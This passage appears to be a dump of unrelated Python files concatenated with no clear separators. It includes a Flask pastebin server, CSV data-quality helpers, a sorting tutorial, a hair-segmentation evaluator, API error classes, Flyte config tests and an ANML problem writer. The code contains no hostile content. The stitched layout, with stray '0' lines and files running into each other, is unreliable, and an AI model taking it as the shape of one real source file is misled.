date.today().year #local server date #Setup connection pool connpool = SimpleConnectionPool(config.connpool_min, config.connpool_max, config.dsn) @contextmanager def getcursor(cursor_factory=None): con = connpool.getconn() try: if cursor_factory: yield con.cursor(cursor_factory=cursor_factory) else: yield con.cursor() con.commit() finally: connpool.putconn(con) def plain(text): resp = Response(text) resp.headers['Content-Type'] = 'text/plain; charset=utf-8' return resp def set_cache_control(resp, max_age=69): resp.cache_control.public = True resp.cache_control.max_age = int(max_age) return resp def paste_stats(text): stats = {} stats['lines'] = len(text.split('\n')) stats['sloc'] = stats['lines'] for line in text.split('\n'): if not line.strip(): stats['sloc'] -= 1 stats['size'] = len(text.encode('utf-8')) return stats def url_collision(cursor, route): for rule in app.url_map.iter_rules(): if rule.rule == '/' + route: return True with cursor as cur: cur.execute("SELECT pasteid FROM pastes WHERE pasteid = %s;", (route,)) if cur.fetchone(): return True return False def db_newpaste(cursor, opt, stats): date = datetime.utcnow() date += timedelta(hours=float(opt['ttl'])) with cursor as cur: cur.execute("""INSERT INTO pastes (pasteid, token, lexer, expiration, burn, paste, paste_lexed, size, lines, sloc) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);""", \ (opt['pasteid'], opt['token'], opt['lexer'], \ date, opt['burn'], opt['paste'], opt['paste_lexed'], \ stats['size'], stats['lines'], stats['sloc'])) def db_getpaste(cursor, pasteid): with cursor as cur: cur.execute(("""SELECT * FROM pastes WHERE pasteid = %s;"""), (pasteid,)) return cur.fetchone() def db_deletepaste(cursor, pasteid): with cursor as cur: cur.execute(("""DELETE FROM pastes WHERE pasteid = %s;"""), (pasteid,)) def db_burn(cursor, pasteid): with cursor as cur: cur.execute(("""UPDATE pastes SET burn = burn - 1 WHERE pasteid = %s;"""), (pasteid,)) @app.route('/', methods=['GET', 'POST']) @app.route('/newpaste', methods=['POST']) #only used via html form def newpaste(): if request.method == 'POST': paste_opt = {} for param in config.defaults: #init form parameters with defaults paste_opt[param] = config.defaults[param] for param in request.form: if param in paste_opt: paste_opt[param] = request.form[param] if paste_opt['paste'] == '': return config.msg_empty_paste, 400 try: if not config.paste_limits['ttl_min'] < \ float(paste_opt['ttl']) < \ config.paste_limits['ttl_max']: return config.msg_invalid_ttl, 400 except ValueError: return config.msg_invalid_ttl, 400 lexer = "" try: if paste_opt['lexer'] == 'auto': lexer = guess_lexer(paste_opt['paste']) paste_opt['lexer'] = lexer.aliases[0] else: lexer = get_lexer_by_name(paste_opt['lexer']) except pygments.util.ClassNotFound: paste_opt['lexer'] = 'text' lexer = get_lexer_by_name(paste_opt['lexer']) formatter = HtmlFormatter(nowrap=True, cssclass='paste') paste_opt['paste_lexed'] = highlight(paste_opt['paste'], lexer, formatter) try: if paste_opt['burn'] == '' or paste_opt['burn'] == 0 or paste_opt['burn'] == config.defaults['burn']: paste_opt['burn'] = config.defaults['burn'] elif not config.paste_limits['burn_min'] <= int(paste_opt['burn']) <= config.paste_limits['burn_max']: return config.msg_invalid_burn, 400 except ValueError: return config.msg_invalid_burn, 400 url_len = config.url_len paste_opt['pasteid'] = '' while url_collision(getcursor(), paste_opt['pasteid']): paste_opt['pasteid'] = '' for _ in range(url_len): paste_opt['pasteid'] += choice(config.url_alph) url_len += 1 paste_opt['token'] = \ urlsafe_b64encode((getrandbits(config.token_len * 8)) \ .to_bytes(config.token_len, 'little')).decode('utf-8') stats = paste_stats(paste_opt['paste']) #generate text stats db_newpaste(getcursor(), paste_opt, stats) pastecount(getcursor()) #increment total pastes if request.path != '/newpaste': #plaintext reply if paste_opt['raw'] == 'true': reptype = 'viewraw' else: reptype = 'viewpaste' return config.domain + url_for(reptype, pasteid=paste_opt['pasteid']) + \ " | " + paste_opt['token'] + "\n" flash(paste_opt['token']) return redirect(paste_opt['pasteid']) elif request.method == 'GET': lexers_all = sorted(get_all_lexers()) return set_cache_control(make_response(render_template('newpaste.html', \ lexers_all=lexers_all, lexers_common=config.lexers_common, \ ttl=config.ttl_options, paste_limits=config.paste_limits)), config.nonpaste_max_age) @app.route('/', methods=['GET', 'DELETE']) def viewpaste(pasteid): if request.method == 'GET': direction = 'ltr' result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: abort(404) if result['burn'] == 0 or result['expiration'] < datetime.utcnow(): db_deletepaste(getcursor(), pasteid) abort(404) elif result['burn'] > 0: db_burn(getcursor(), pasteid) pasteview(getcursor()) #count towards total paste views if request.args.get('raw') is not None: return set_cache_control(plain(result['paste']), config.paste_max_age) if request.args.get('d') is not None: direction = 'rtl' stats = {'lines': result['lines'], 'sloc': result['sloc'], 'size': result['size'], 'lexer': result['lexer'] } messages = get_flashed_messages() if messages: token = messages[0] else: token = '' del_url = url_for('deletepaste', pasteid=pasteid, token=token) resp = make_response(render_template('viewpaste.html', \ stats=stats, paste=result['paste_lexed'].split("\n"), direction=direction, delete=del_url)) return set_cache_control(resp, config.paste_max_age) elif request.method == 'DELETE': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 elif 'token' in request.form and result['token'] == request.form['token']: db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 elif 'token' in request.headers and result['token'] == request.headers.get('token'): db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 else: return config.msg_err_401, 401 @app.route('/plain/', methods=['GET', 'DELETE']) @app.route('/raw/', methods=['GET', 'DELETE']) def viewraw(pasteid): if request.method == 'GET': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 if result['burn'] == 0 or result['expiration'] < datetime.utcnow(): db_deletepaste(getcursor(), pasteid) return config.msg_err_404, 404 elif result['burn'] > 0: db_burn(getcursor(), pasteid) pasteview(getcursor()) #count towards total paste views return set_cache_control(plain(result['paste']), config.paste_max_age) elif request.method == 'DELETE': result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: return config.msg_err_404, 404 elif 'token' in request.form and result['token'] == request.form['token']: db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 elif 'token' in request.headers and result['token'] == request.headers.get('token'): db_deletepaste(getcursor(), pasteid) return config.msg_paste_deleted, 200 else: return config.msg_err_401, 401 else: return "invalid http method\n" @app.route('//', methods=['GET']) def deletepaste(pasteid, token): result = db_getpaste(getcursor(cursor_factory=DictCursor), pasteid) if not result: abort(404) elif result['token'] == token: db_deletepaste(getcursor(), pasteid) return render_template('deleted.html') else: abort(401) @app.route('/about/api') def aboutapi(): return set_cache_control(make_response(render_template('api.html')), config.nonpaste_max_age) @app.route('/about') def aboutpage(): return set_cache_control(make_response(render_template('about.html')), config.nonpaste_max_age) @app.route('/stats') def statspage(): stats = getstats(getcursor(cursor_factory=DictCursor)) return set_cache_control(make_response(render_template('stats.html', stats=stats)), config.nonpaste_max_age) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 @app.errorhandler(500) def internal_server_error(e): return render_template('500.html'), 500 if __name__ == '__main__': app.debug = False app.run() appinho/SASelfDrivingCar import numpy as np sensor_poses = [ (0.1425, 0.0, 0.0), (0.0, 0.09, np.pi / 2), (-0.1425, 0.0, np.pi), (0.0, -0.09, -np.pi / 2), ] scripts/config.py """ Configuration helpers. """ import os import sys # Paths DIRNAME = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.dirname(DIRNAME) def add_root_to_path() -> None: """ Adds the root of the repository to the path, so that we can import functions from src. """ sys.path.append(ROOT_DIR) """See Jupyter notebooks on how to use these module to assess data quality of .csv data. Note that python-3.6+ permits '_' as floating point separator, thus this module will treat '_'-separated float string as valid floating points. """ import json import pandas as pd import re ALPHANUMERIC_REGEXP = re.compile(r'[0-9a-zA-Z]') def read_csv_as_str(*args, **kwargs): """Read .csv but return contenst as-is string, i.e., no dtype conversion and nan treatment.""" kwargs['dtype'] = str kwargs['na_filter'] = False return pd.read_csv(*args, **kwargs) def check_all(df, max_value_to_show=10): """Perform check_columns() and check_datapoints_dtype().""" dfs = [check_columns(df, max_value_to_show), check_datapoints_dtype(df).iloc[:, 1:]] return pd.concat(dfs, axis=1) def check_possible_dtype(df, skip_fn=None, print_str=False): """Guess dtypes for each column in a dataframe, where dataframe must contains only string values otherwise exception occurs. :param df: a DataFrame whose all values must be strings. """ column = [] int_cnt = [] dec_cnt = [] str_cnt = [] d = {'column': column, 'int_cnt': int_cnt, 'dec_cnt': dec_cnt, 'str_cnt': str_cnt} for i in df.columns: ser = df[i].drop_duplicates() column.append(i) int_cnt.append(ser.apply(lambda x: is_int_str(x, skip_fn)).sum()) dec_cnt.append(ser.apply(lambda x: is_dec_str(x, skip_fn)).sum()) str_cnt.append(ser.apply(lambda x: is_not_number_str(x, skip_fn, print_str)).sum()) dtype_options_df = pd.DataFrame(d, columns=['column', 'int_cnt', 'dec_cnt', 'str_cnt']) # Best-effort guess on dtype guessed_dtype = dtype_options_df.apply(guess_dtype, axis=1).rename('guessed_type') return pd.concat([dtype_options_df, guessed_dtype], axis=1) def extract_str_values(df, skip_fn=None) -> pd.DataFrame: """ :rtype: """ column = [] str_values = [] d = {'column': column, 'str_values': str_values} for i in df.columns: ser = df[i].drop_duplicates() column.append(i) str_filter = ser.apply(lambda x: is_not_number_str(x, skip_fn)) str_ser = ser[str_filter] str_values.append(json.dumps(str_ser.tolist(), ensure_ascii=False)) return pd.DataFrame(d, columns=['column', 'str_values']) def check_columns(df, max_item_to_show=10): """Column dtype are computed from non-NaN values to prevent int64 columns becomes float64.""" column = [] dtyp = [] uniq_cnt = [] data_cnt = [] nan_cnt = [] sample_value = [] d = {'column': column, 'dtype': dtyp, 'uniq_cnt': uniq_cnt, 'data_cnt': data_cnt, 'nan_cnt': nan_cnt, 'sample_value': sample_value} for i in df.columns: col = df[i] uniques = col.unique() cnt = len(col) column.append(i) dtyp.append(col.dropna().dtype) uniq_cnt.append(len(uniques)) nan_cnt.append(cnt - col.count()) data_cnt.append(cnt) # Convert to string, otherwise jupyter notebook display without padding spaces # sample_value.append(str(uniques[:max_item_to_show].tolist())) sample_value.append(json.dumps(uniques[:max_item_to_show].tolist())) return pd.DataFrame(d, columns=['column', 'dtype', 'uniq_cnt', 'data_cnt', 'nan_cnt', 'sample_value']) def check_datapoints_dtype(df): """Only dtypes of non-NaN values to prevent int64 columns become float64.""" column = list(df.columns) dtypes = [] dtype_cnt = [] d = {'column': column, 'dtypes': dtypes, 'dtype_cnt': dtype_cnt} for i in column: dt = df[i].dropna().apply(lambda x: x.__class__.__name__).unique().tolist() dtypes.append(dt) dtype_cnt.append(len(dt)) return pd.DataFrame(d, columns=['column', 'dtypes', 'dtype_cnt']) def guess_dtype(x): if x['str_cnt'] > 0: return 'str' if x['dec_cnt'] != x['int_cnt']: return 'float' if x['int_cnt'] == 0 and x['dec_cnt'] == 0: return 'str' return 'int' def is_suspicious_str(s) -> bool: """Check whether string `s` looks suspicious (e.g., '' or a non-alphanumeric value).""" try: _ = s.encode('ascii') return True if s == '' else not ALPHANUMERIC_REGEXP.search(s) except UnicodeEncodeError: # Treat string with non-CJK_space characters as "not suspicious". # NOTE: # - \u3000 is CJK whitespace # - There're other unicode whitespaces listed here: https://stackoverflow.com/a/37903645 return b'\\u3000' in s.encode('unicode_escape') except: print(s) raise def is_int_str(x: str, skip_fn=None): if skip_fn is not None and skip_fn(x): return False return x.isnumeric() def is_dec_str(x: str, skip_fn=None): if skip_fn is not None and skip_fn(x): return False try: float(x) except: return False else: return True def is_not_number_str(x: str, skip_fn=None, print_str=False): if skip_fn is not None and skip_fn(x): return False try: float(x) except: if print_str: print(x) return True else: return False 0 """ → sort() method = used with lists → sort() function = used with iterables """ students = [("Squidward", "F", 60), ("Sandy", "A", 33), ("Patrick", "D", 36), ("Spongebob", "B", 20), ("Mr. Krabs", "C", 78)] # students.sort() # sorted_students = sorted(students) # # for i in sorted_students: # print(i) # sort the list of tuples age = lambda ages:ages[2] students.sort(key=age, reverse=True) for i in students: print(i) students_tuple = (("Squidward", "F", 60), ("Sandy", "A", 33), ("Patrick", "D", 36), ("Spongebob", "B", 20), ("Mr. Krabs", "C", 78)) name = lambda names:names[0] sorted_students_tuple = sorted(students_tuple, key=name) print("---------------------") print("Students Tuple:") for i in sorted_students_tuple: print(i) 0 #coding:utf8 ''' Created on 2013-8-14 @author: lan ''' import memmode from firefly.dbentrust.madminanager import MAdminManager def load_config_data(): """从数据库中读取配置信息 """ def registe_madmin(): """注册数据库与memcached对应 """ MAdminManager().registe( memmode.tb_character_admin) MAdminManager().registe( memmode.tb_item_admin) MAdminManager().registe( memmode.tb_itemopen_admin) MAdminManager().registe( memmode.tb_skill_admin) MAdminManager().registe( memmode.tb_specskill_admin) MAdminManager().registe( memmode.tb_pet_admin) MAdminManager().registe( memmode.tb_petskill_admin) MAdminManager().registe( memmode.tb_partner_admin) MAdminManager().registe( memmode.tb_partnerskill_admin) chintak/fast-hair-segmentation import argparse import cPickle as pickle from glob import glob import multiprocessing as mp import numpy as np import os from scipy.io import loadmat from skimage.io import imread from sklearn.datasets import dump_svmlight_file from subprocess import call import sys import xgboost as xgb import tempfile as tm import configs from configs import HAIR, FACE, BKG import data from utils import * EPS = np.finfo(float).eps def pr_calc(yt, yp): tp = np.sum((yt == yp) & (yt == 1)) tn = np.sum((yt == yp) & (yt == 0)) fp = np.sum((yt != yp) & (yt == 1)) fn = np.sum((yt != yp) & (yt == 0)) return tp, tn, fp, fn def evaluate(names, keyps, model_fname, q): models = hr_name_to_models(model_fname) ttp, ttn, tfp, tfn = 0, 0, 0, 0 for k, (name, keyp) in enumerate(zip(names, keyps)): if not os.path.exists(name): continue im = imread(name) pr = hr_predict_single(im, keyp, models, overlap=0.5) gt = data.img2gt(name) tp, tn, fp, fn = pr_calc((gt==HAIR), (pr==HAIR)) ttp += tp; ttn += tn; tfp += fp; tfn += fn # if k % 50 == 0: print "[{}] Done {}".format(os.getpid(), k) q.put((ttp, ttn, tfp, tfn)) def eval(model_fname, mat_viz_file): print "==================================" q = mp.Queue() names, keypoints = data.mat_to_name_keyp(mat_viz_file) NUM_TRAIN_SAMPS = len(names) nprocs = mp.cpu_count() chunksize = int(NUM_TRAIN_SAMPS // nprocs) procs = [] for i in range(nprocs): lim = chunksize * (i+1) if i < nprocs - 1 else NUM_TRAIN_SAMPS p = mp.Process(target=evaluate, args=(names[chunksize*i:lim], keypoints[chunksize*i:lim], model_fname, q)) procs.append(p) p.start() for p in procs: p.join() ttp, ttn, tfp, tfn = 0., 0., 0., 0. for i in range(nprocs): tp, tn, fp, fn = q.get() ttp += tp; ttn += tn; tfp += fp; tfn += fn print "Model: {} pixel level:".format(model_fname) print "\thair accuracy = {:.03f}".format(1. - (tfp + tfn) / (EPS + tfn + tfp + ttp + ttn)) print "\tprec \t= {:.03f}".format((ttp) / (EPS + ttp + tfp)) print "\trec \t= {:.03f}".format((ttp) / (EPS + ttp + tfn)) def args(): args = argparse.ArgumentParser() args.add_argument('model_file', help='') args.add_argument('mat_file', help='') return args.parse_args() if __name__ == '__main__': parse = args() eval(parse.model_file, parse.mat_file) from typing import Dict from typing import List from typing import Union class BaseError(Exception): code: int = 50000 name: str = "UNKNOWN_ERROR" detail: Union[str, List[Dict]] = "" def __init__(self, detail: Union[str, List[Dict]] = ""): self.detail = detail @property def http_code(self) -> int: return self.code // 100 def dict(self) -> dict: return { "code": self.code, "name": self.name, "detail": self.detail, } class BadRequestError(BaseError): code: int = 40000 name: str = "BAD_REQUEST" class InvalidParameterError(BaseError): code: int = 40001 name: str = "INVALID_PARAMETER" class NotFoundError(BaseError): code: int = 40400 name: str = "PATH_NOT_FOUND" class ProcessNotFoundError(BaseError): code: int = 40401 name: str = "PROCESS_NOT_FOUND" class MethodNotAllowedError(BaseError): code: int = 40500 name: str = "METHOD_NOT_ALLOWED" class InternalError(BaseError): name: str = "INTERNAL_ERROR" class SupervisordError(BaseError): code: int = 50001 name: str = "SUPERVISORD_ERROR" """ Copyright 2020 The Magma Authors. This source code is licensed under the BSD-style license found in the LICENSE file in the root directory of this source tree. Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import json from typing import Dict, List, NamedTuple from orc8r.protos.service303_pb2 import State ICMP_STATE_TYPE = "icmp_monitoring" ICMPMonitoringResponse = NamedTuple('ICMPMonitoringResponse', [('last_reported_time', int), ('latency_ms', float)]) def serialize_subscriber_states( sub_table: Dict[str, ICMPMonitoringResponse]) -> List[State]: states = [] for sub, icmp_resp in sub_table.items(): serialized = json.dumps(icmp_resp._asdict()) state = State( type=ICMP_STATE_TYPE, deviceID=sub, value=serialized.encode('utf-8') ) states.append(state) return states import os as _os from flytekit.configuration import common as _common from flytekit.core.utils import AutoDeletingTempDir as _AutoDeletingTempDir def test_lookup_waterfall_raw_env_var(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None _os.environ["FLYTE_TEST_SETTING"] = "lorem" assert x.get() == "lorem" def test_lookup_waterfall_referenced_env_var(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None if "TEMP_PLACEHOLDER" in _os.environ: del _os.environ["TEMP_PLACEHOLDER"] _os.environ["TEMP_PLACEHOLDER"] = "lorem" _os.environ["FLYTE_TEST_SETTING_FROM_ENV_VAR"] = "TEMP_PLACEHOLDER" assert x.get() == "lorem" def test_lookup_waterfall_referenced_file(): x = _common.FlyteStringConfigurationEntry("test", "setting", default=None) if "FLYTE_TEST_SETTING" in _os.environ: del _os.environ["FLYTE_TEST_SETTING"] assert x.get() is None with _AutoDeletingTempDir("config_testing") as tmp_dir: with open(tmp_dir.get_named_tempfile("name"), "w") as fh: fh.write("secret_password") _os.environ["FLYTE_TEST_SETTING_FROM_FILE"] = tmp_dir.get_named_tempfile("name") assert x.get() == "secret_password" # Copyright 2021 AIPlan4EU project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from fractions import Fraction import re import sys import unified_planning as up import unified_planning.environment import unified_planning.walkers as walkers from unified_planning.model import DurativeAction, InstantaneousAction, Fluent, Parameter, Object from unified_planning.model.types import _UserType, _RealType, _IntType from typing import IO, Dict, List, Optional, cast, Union from io import StringIO ANML_KEYWORDS = {'action', 'and', 'constant', 'duration', 'else', 'fact', 'fluent', 'function', 'goal', 'in', 'instance', 'motivated', 'predicate', 'symbol', 'variable', 'when', 'with', 'decomposition', 'use', 'coincident', 'comprise', 'comprises', 'contain', 'contains', 'exists', 'forall', 'implies', 'iff', 'not', 'or', 'ordered', 'unordered', 'xor', 'UNDEFINED', 'all', 'end', 'false', 'infinity', 'object', 'start', 'true', 'boolean', 'float', 'rational', 'integer', 'string', 'type', 'set', 'subset', 'powerset', 'intersect', 'union', 'elt'} # The following map is used to mangle the invalid names by their class. INITIAL_LETTER: Dict[type, str] = {InstantaneousAction: 'a', DurativeAction: 'a', Fluent: 'f', Parameter: 'p', Object: 'o'} class ConverterToANMLString(walkers.DagWalker): '''Expression converter to an ANML string.''' def __init__(self, names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str], env: 'up.environment.Environment'): walkers.DagWalker.__init__(self) self._names_mapping = names_mapping self.simplifier = walkers.Simplifier(env) def convert(self, expression): '''Converts the given expression to a ANML string.''' return self.walk(self.simplifier.simplify(expression)) #NOTE maybe the converter could remove the first and last char, if they are '(' and ')' def walk_exists(self, expression, args): assert len(args) == 1 vars_string_gen = (f'{_get_anml_name(v.type, self._names_mapping)} {_get_anml_name(v, self._names_mapping)}' for v in expression.variables()) return f'(exists({", ".join(vars_string_gen)}) {{ {args[0]} }})' def walk_forall(self, expression, args): assert len(args) == 1 vars_string_gen = (f'{_get_anml_name(v.type, self._names_mapping)} {_get_anml_name(v, self._names_mapping)}' for v in expression.variables()) return f'(forall({", ".join(vars_string_gen)}) {{ {args[0]} }})' def walk_variable_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.variable(), self._names_mapping) def walk_and(self, expression, args): assert len(args) > 1 return f'({" and ".join(args)})' def walk_or(self, expression, args): assert len(args) > 1 return f'({" or ".join(args)})' def walk_not(self, expression, args): assert len(args) == 1 return f'(not {args[0]})' def walk_implies(self, expression, args): assert len(args) == 2 return f'({args[0]} implies {args[1]})' def walk_iff(self, expression, args): assert len(args) == 2 return f'({args[0]} iff {args[1]})' def walk_fluent_exp(self, expression, args): if len(args) == 0: return self._names_mapping[expression.fluent()] else: return f'{self._names_mapping[expression.fluent()]}({", ".join(args)})' def walk_param_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.parameter(), self._names_mapping) def walk_object_exp(self, expression, args): assert len(args) == 0 return _get_anml_name(expression.object(), self._names_mapping) def walk_bool_constant(self, expression, args): assert len(args) == 0 if expression.bool_constant_value(): return 'true' return 'false' def walk_real_constant(self, expression, args): assert len(args) == 0 frac = cast(Fraction, expression.constant_value()) return f'({frac.numerator}/{frac.denominator})' def walk_int_constant(self, expression, args): assert len(args) == 0 return str(expression.constant_value()) def walk_plus(self, expression, args): assert len(args) > 1 return f"({' + '.join(args)})" def walk_minus(self, expression, args): assert len(args) == 2 return f'({args[0]} - {args[1]})' def walk_times(self, expression, args): assert len(args) > 1 return f"({' * '.join(args)})" def walk_div(self, expression, args): assert len(args) == 2 return f'({args[0]} / {args[1]})' def walk_le(self, expression, args): assert len(args) == 2 return f'({args[0]} <= {args[1]})' def walk_lt(self, expression, args): assert len(args) == 2 return f'({args[0]} < {args[1]})' def walk_equals(self, expression, args): assert len(args) == 2 return f'({args[0]} == {args[1]})' class ANMLWriter: '''This class can be used to write a Problem in ANML.''' def __init__(self, problem: 'up.model.Problem'): self.problem = problem def _write_problem(self, out: IO[str]): names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str] = {} # Init names_mapping. names_mapping[self.problem.env.type_manager.BoolType()] = 'boolean' names_mapping[self.problem.env.type_manager.IntType()] = 'integer' names_mapping[self.problem.env.type_manager.RealType()] = 'float' for t in self.problem.user_types: ut = cast(_UserType, t) if _is_valid_anml_name(ut.name): # No renaming needed names_mapping[t] = ut.name for a in self.problem.actions: if _is_valid_anml_name(a.name): # No renaming needed names_mapping[a] = a.name for f in self.problem.fluents: if _is_valid_anml_name(f.name): # No renaming needed names_mapping[f] = f.name for o in self.problem.all_objects: if _is_valid_anml_name(o.name): # No renaming needed names_mapping[o] = o.name for t in self.problem.user_types: anml_type_name = _get_anml_name(t, names_mapping) out.write(f'type {anml_type_name}') if cast(_UserType, t).father is None: out.write(';\n') else: # For construction in the Problem, the father of a UserType is always added before the UserType itself. father = cast(_UserType, t).father assert father is not None assert names_mapping[father] is not None out.write(f' < {names_mapping[father]};\n') static_fluents = self.problem.get_static_fluents() for f in self.problem.fluents: parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in f.signature] params_written = f'({", ".join(parameters)})' if len(parameters) > 0 else '' if f in static_fluents: out.write(f'constant {_get_anml_name(f.type, names_mapping)} {_get_anml_name(f, names_mapping)}{params_written};\n') else: out.write(f'fluent {_get_anml_name(f.type, names_mapping)} {_get_anml_name(f, names_mapping)}{params_written};\n') converter = ConverterToANMLString(names_mapping, self.problem.env) for a in self.problem.actions: if isinstance(a, up.model.InstantaneousAction): parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in a.parameters] out.write(f'action {_get_anml_name(a, names_mapping)}({", ".join(parameters)}) {{\n') for p in a.preconditions: out.write(f' [ start ] {converter.convert(p)};\n') for e in a.effects: out.write(f' {self._convert_effect(e, converter, None, 3)}') out.write('};\n') elif isinstance(a, DurativeAction): parameters = [f'{_get_anml_name(ap.type, names_mapping)} {_get_anml_name(ap, names_mapping)}' for ap in a.parameters] out.write(f'action {_get_anml_name(a, names_mapping)}({", ".join(parameters)}) {{\n') left_bound = ' > ' if a.duration.is_left_open() else ' >= ' right_bound = ' < ' if a.duration.is_right_open() else ' <= ' out.write(f' duration{left_bound}{converter.convert(a.duration.lower)} and ') out.write(f'duration{right_bound}{converter.convert(a.duration.upper)};\n') for i, cl in a.conditions.items(): for c in cl: out.write(f' {self._convert_anml_interval(i)} {converter.convert(c)};\n') for ti, el in a.effects.items(): for e in el: out.write(f' {self._convert_effect(e, converter, ti, 3)}') out.write('};\n') else: raise NotImplementedError for t in self.problem.user_types: # Define objects obj_names = [_get_anml_name(o, names_mapping) for o in self.problem.objects(t) if o.type == t] if len(obj_names) > 0: out.write(f'instance {_get_anml_name(t, names_mapping)} {", ".join(obj_names)};\n') for fe, v in self.problem.initial_values.items(): assert fe.is_fluent_exp() if fe.fluent() in static_fluents: out.write(f'{converter.convert(fe)} := {converter.convert(v)};\n') else: out.write(f'[ start ] {converter.convert(fe)} := {converter.convert(v)};\n') for ti, el in self.problem.timed_effects.items(): for e in el: out.write(self._convert_effect(e, converter, ti)) for g in self.problem.goals: out.write(f'[ end ] {converter.convert(g)};\n') for i, gl in self.problem.timed_goals.items(): for g in gl: out.write(f'{self._convert_anml_interval(i)} {converter.convert(g)};\n') def print_problem(self): '''Prints to std output the ANML problem.''' self._write_problem(sys.stdout) def get_problem(self) -> str: '''Returns the ANML problem.''' out = StringIO() self._write_problem(out) return out.getvalue() def write_problem(self, filename: str): '''Dumps to file the ANML problem.''' with open(filename, 'w') as f: self._write_problem(f) def _convert_effect(self, effect: 'up.model.Effect', converter: ConverterToANMLString, timing: 'up.model.Timing' = None, spaces_from_left: int = 0) -> str: results: List[str] = [] anml_timing = self._convert_anml_timing(timing) if timing is not None else 'start' if effect.is_conditional(): results.append(f'when [ {anml_timing} ] {converter.convert(effect.condition)}\n{spaces_from_left*" "}{{') results.append(f'[ {anml_timing} ] ') results.append(converter.convert(effect.fluent)) if effect.is_assignment(): results.append(' := ') elif effect.is_increase(): results.append(f' :increase ') elif effect.is_decrease(): results.append(f' :decrease ') else: raise NotImplementedError results.append(f'{converter.convert(effect.value)};\n') if effect.is_conditional(): results.append(f'{spaces_from_left*" "}}}\n') return ''.join(results) def _convert_anml_timing(self, timing: 'up.model.Timing') -> str: time = 'start' if timing.is_from_start() else 'end' if timing.delay > 0: return f'{time} + {str(timing.delay)}' elif timing.delay == 0: return time else: #timing.delay < 0 return f'{time} - {str(timing.delay * (-1))}' def _convert_anml_interval(self, interval: 'up.model.TimeInterval') -> str: left_bracket = '(' if interval.is_left_open() else '[' right_bracket = ')' if interval.is_left_open() else ']' return f'{left_bracket} {self._convert_anml_timing(interval.lower)}, {self._convert_anml_timing(interval.upper)} {right_bracket}' def _is_valid_anml_name(name: str) -> bool: regex = re.compile(r'^[a-zA-Z][a-zA-Z0-9_]*') if re.match(regex, name) is None or name in ANML_KEYWORDS: # If the name does not start with an alphabetic char or is a keyword return False return True def _get_anml_valid_name(item: Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object']) -> str: '''This function returns a valid ANML name.''' if isinstance(item, up.model.Type): assert item.is_user_type() name = cast(_UserType, item).name else: name = item.name regex = re.compile(r'^[a-zA-Z]+.*') if re.match(regex, name) is None: # If the name does not start with an alphabetic char, we make it start with one. name = f'{INITIAL_LETTER.get(type(item), "x")}_{name}' name = re.sub('[^0-9a-zA-Z_]', '_', name) #Substitute non-valid elements with "_" while name in ANML_KEYWORDS: # If the name is in the keywords, apply an underscore at the end until it is not a keyword anymore. name = f'{name}_' return name def _get_anml_name(item: Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], names_mapping: Dict[Union['up.model.Type', 'up.model.Action', 'up.model.Parameter', 'up.model.Fluent', 'up.model.Object'], str]) -> str: '''Important note: This method updates the names_mapping ''' new_name: Optional[str] = names_mapping.get(item, None) if new_name is None: # The type is not in the dictionary, so his name must be added if isinstance(item, up.model.Type) and item.is_int_type(): num_type = cast(_IntType, item) left_bound = '(-infinity' if num_type.lower_bound is None else f'[{str(num_type.lower_bound)}' right_bound = 'infinity)' if num_type.upper_bound is None else f'{str(num_type.upper_bound)}]' new_name = f'integer {left_bound}, {right_bound}' elif isinstance(item, up.model.Type) and item.is_real_type(): num_real_type = cast(_RealType, item) if num_real_type.lower_bound is None: left_bound = '(-infinity' elif num_real_type.lower_bound.denominator == 1: left_bound = f'[{str(num_real_type.lower_bound)}.0' else: left_bound = f'[{str(num_real_type.lower_bound)}' if num_real_type.upper_bound is None: right_bound = 'infinity)' elif num_real_type.upper_bound.denominator == 1: right_bound = f'{str(num_real_type.upper_bound)}.0]' else: right_bound = f'{str(num_real_type.upper_bound)}]' new_name = f'float {left_bound}, {right_bound}' else: # We mangle the name and get a fresh one new_name = _get_anml_valid_name(item) test_name = new_name # Init values count = 0 while test_name in names_mapping.values(): # Loop until we find a fresh name test_name = f'{new_name}_{str(count)}' count += 1 new_name = test_name assert _is_valid_anml_name(new_name) names_mapping[item] = new_name # Once a fresh valid name is found, update the map. return cast(str, new_name) import pandas as pd import statsmodels.tsa.stattools as ts import seaborn import numpy as np import cointegration import statistics # to do # 5 day moving average, more than 1 pair, 100,000 import 